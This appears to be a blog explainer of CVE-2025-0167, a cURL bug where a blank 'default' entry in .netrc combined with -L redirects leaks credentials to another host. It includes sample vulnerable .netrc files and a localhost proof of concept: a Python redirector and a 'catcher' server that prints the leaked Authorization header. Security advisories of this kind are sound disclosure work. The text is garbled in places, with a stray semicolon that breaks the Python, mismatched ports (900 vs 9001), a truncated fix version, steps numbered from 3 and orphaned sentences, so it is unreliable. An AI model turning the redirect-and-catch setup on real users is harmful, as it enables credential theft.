CVE-2025-0167 - How a Rare `.netrc` Configuration Can Leak Your Credentials in Curl Redirects

When you use cURL, it's natural to expect your credentials to stay private—especially if you took the trouble to set up a .netrc file to avoid putting usernames and passwords on the command line. But sometimes, rare combinations can lead to security surprises. CVE-2025-0167 is one such vulnerability, showing how credentials you meant for one site could accidentally travel to a different one.

Let's break down what happened, how it works, and what you can do to keep your credentials safe.

The Heart of the Vulnerability

cURL lets you automate web requests, often using the .netrc file to provide credentials automatically. The bug behind CVE-2025-0167 creeps in when both of these are true (which is unusual):

You allow cURL to follow HTTP redirects (with -L).

Under certain rare circumstances, if your .netrc file contains a default entry without a login or password (like default with only machine data or both fields missing), your password for the original site could be sent to the new host after a redirect.

Usually your .netrc file might look like this

machine example.com
    login myuser
    password mypass

machine another.com
    login otheruser
    password secret123

But sometimes people add a default entry, which is used as a fallback. A vulnerable config would be:

machine example.com
    login myuser
    password mypass

default

Or even

default
    login
    password

If both user and password are blank—even on purpose, thinking that prevents access—it actually triggers the bug.

Suppose you run a cURL command like this (where -L follows redirects)

curl -L --netrc https://example.com

example.com responds: Instead of giving content, it sends a redirect to malicious.com.

3. Second request: cURL follows to malicious.com. Here's the twist: because the default entry is blank, cURL may accidentally send myuser:mypass meant for example.com to malicious.com in the Authorization header.

That means your sensitive credentials for example.com just got leaked to another site, even though you only ever intended them for example.com.

Set up a malicious HTTP redirector (Python):

# Save as redirector.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', 'http://localhost:9001/';)
        self.end_headers()

server = HTTPServer(('localhost', 900), RedirectHandler)
server.serve_forever()

Set up a "malicious" catcher (Python):

# Save as catcher.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class CatcherHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(self.headers)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Got your request!")

server = HTTPServer(('localhost', 9001), CatcherHandler)
server.serve_forever()

.netrc file:

machine localhost
    login testuser
    password secretpassword
default

Run the servers in different terminal windows:

python3 redirector.py
python3 catcher.py

Make the cURL request:

curl -L --netrc http://localhost:900/

Check the output on catcher.py—do you see an Authorization header with your creds? That's the bug!

Most use specific machine entries.

- cURL defaults don't set --netrc nor follow redirects unless told (-L), but security is all about the edge cases.

Who's Affected?

- Applications and scripts that use cURL with --netrc or --netrc-optional and follow redirects.

.netrc files with a default entry that omits login and password.

If you write scripts, automation, or DevOps tools, check your cURL commands and .netrc structure!

How To Fix

The cURL maintainers patched this in curl 8.7.. The fix ensures that login information is not sent to a different host than intended, even with this rare type of .netrc entry.

Upgrade cURL to the latest version.

- Revisit your .netrc file: Avoid blank default entries. Remove the default entry if it's not needed.
- Use site-specific machine entries instead of relying on default values, especially for important credentials.

Links & References

- cURL Security Advisory: CVE-2025-0167
- cURL Official Documentation on .netrc
- .netrc File Format

Takeaway

All software has edge cases, and so do configuration files. CVE-2025-0167 is a reminder: even a small, odd detail in your .netrc file—like a default entry without a login or password—can have consequences, especially paired with certain flags like -L. Patch and audit now to keep your credentials where they belong.

Timeline

Published on: 02/05/2025 10:15:22 UTC
Last modified on: 02/06/2025 15:15:16 UTC